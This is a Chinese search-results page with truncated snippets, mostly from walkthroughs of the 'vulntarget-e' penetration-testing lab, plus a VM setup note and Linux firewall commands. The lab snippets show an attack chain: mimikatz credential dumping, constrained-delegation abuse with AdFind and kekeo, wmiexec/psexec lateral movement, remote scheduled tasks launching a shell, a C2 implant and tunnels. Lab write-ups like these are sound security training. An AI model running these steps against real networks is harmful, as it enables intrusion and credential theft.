首页
学习
活动
专区
工具
TVP
发布

vulntarget-e

虚拟机网络配置: 拓扑图: 信息搜集 扫描存活主机和端口 这里外网win2016靶机有开防火墙,所以需要加个-d参数绕过防火墙进行端口扫描,但是这里扫的时候出了点问题,不过多试几次也能扫出来开放了...# 关闭防火墙 ufw disable # 查看防火墙状态 ufw status 上传fscan扫一下内网,发现主机192.168.88.102开放了135、445、1433端口,存在SQL server...-P pass.txt 192.168.88.102 smb 通过工具wmiexec.py远程执行成功上线 信息搜集发现还有个10.0.10的网卡 发现存在域vulntarget.com 关闭防火墙...是否存在约束委派 mimikatz获取密码:win2008/qweASD123 # 提升权限 privilege::debug # 抓取密码 sekurlsa::logonpasswords 查找约束性委派主机...,可以发现第三台主机win2008对第四台主机10.10的CIFS服务存在约束委派 AdFind.exe -h 10.0.10.128 -u win2008 -up qweASD123 -b "DC=

73220
您找到你想要的搜索结果了吗?
是的
没有找到

安全概述与虚拟化

前言 基于学校安排,有幸前往武汉安全培训两个月,为了不虚度这俩月,努力每天做做笔记吧 本节作业 建立两个win7虚拟机两个win2008 r2虚拟机并做好快照 一、虚拟化VMware是什么?...新建win7虚拟机 安装win7系统 优化win7虚拟机 安装vmware tools,并重启虚拟机(此时,分辨率可以任意调整 还可以任意拖拽文件与真机器互动) 格式化D盘 调出桌面图标 建议关掉防火墙...3.部署win2008 准备win2008 R2 X64的系统镜像 win2008-r2xx-x64-xxx.iso 新建win2008虚拟机 安装win2008系统 安装vmware tools,并重启虚拟机...此时,分辨率可以任意调整 还可以任意拖拽文件与真机器互动 格式化D盘 调出桌面图标 按win键搜索icon 建议关掉防火墙 建议关闭系统自动更新 激活系统 优化win2008虚拟机 关机,做快照!

76210

【永久开源】vulntarget-e打靶记录—作者:NaMi

向日葵RCE 端口开放在1000-65535之间,需要进行扫描探测: 端口被过滤,nmap不能判断端口是否开启,说明开启了防火墙 尝试了好多个绕过防火墙的方法,都不行,可能和本地环境有关。...还可以使用网上的脚本进行探测,既然知道了端口,就直接进行利用了: 可以看到存在漏洞: 查看防火墙状态,有点乱码: netsh advfirewall show allprofile state 关闭所有防火墙...---END RSA PRIVATE KEY----- 然后使用ssh私钥进行登录,使用vulntarget不对,尝试使用root登录成功 vim key && chmod 600 key 2.2 win2008...SMB弱口令 当前机器是有两块网卡: 首先关闭防火墙,这样就可以通155这台机器了 Linux上线,使用C2生成linux木马: ....192.168.100.10 443 null null Linux x64 C2 可以正常执行命令 通过arp -a发现了另一台机器的IP地址: CS的代理太慢了,上传一个frp建立隧道: win2008

1.2K30

【永久开源】vulntarget-e续集

通过资源委派拿到域控的票据之后就可以使用IPC访问域控的文件,还是从约束委派开始做起 通过命令查找配置了约束委派的用户,假设我们已经拿到当前机器的用户名密码了 nami.com\win2008 : admin..._@_2008 使用命令查找约束委派对应的服务 AdFind.exe -h 192.168.1.105 -u win2008 -up admin@2008 -b "DC=nami,DC=com" -...msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto 可以访问域控的CIFS服务 使用kekeo请求用户的TGT tgt::ask /user:win2008...admins" user1 /add /domain 使用psexec直接连接: 或者使用wmiexec: CS或者MSF自带模块: 2.2 计划任务 使用copy命令上传文件到域控制器,由于目标开启了防火墙...18:00 /tr c:/shell3.exe /F schtasks /run /s 192.168.1.105 /tn 124 /i 2.3 HASH 因为我没有免杀mimikatz就直接关掉了防火墙来做测试

49930

linux关闭防火墙或开启防火墙命令_linux防火墙怎么关闭

在linux中防火墙的开启和关闭是可以通过命令来执行的,那么具体是哪个命令呢?下面由学习啦小编为大家整理了linux关闭防火墙的相关命令,希望对大家有所帮助。...1.Linux关闭防火墙命令 1) 永久性生效,重启后不会复原 开启:chkconfig iptables on 关闭:chkconfig iptables off 2) 即时生效,重启后复原 开启:service...iptables start 关闭:service iptables stop 3)在开启了防火墙时,做如下设置,开启相关端口, 修改/etc/sysconfig/iptables 文件,添加以下内容...-j ACCEPT -A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 22 -j ACCEPT 2.补充:linux开启防火墙命令...在开启了防火墙时,做如下设置,开启相关端口, 修改/etc/sysconfig/iptables 文件,添加以下内容: -A RH-Firewall-1-INPUT -m state –state NEW

11.3K20
领券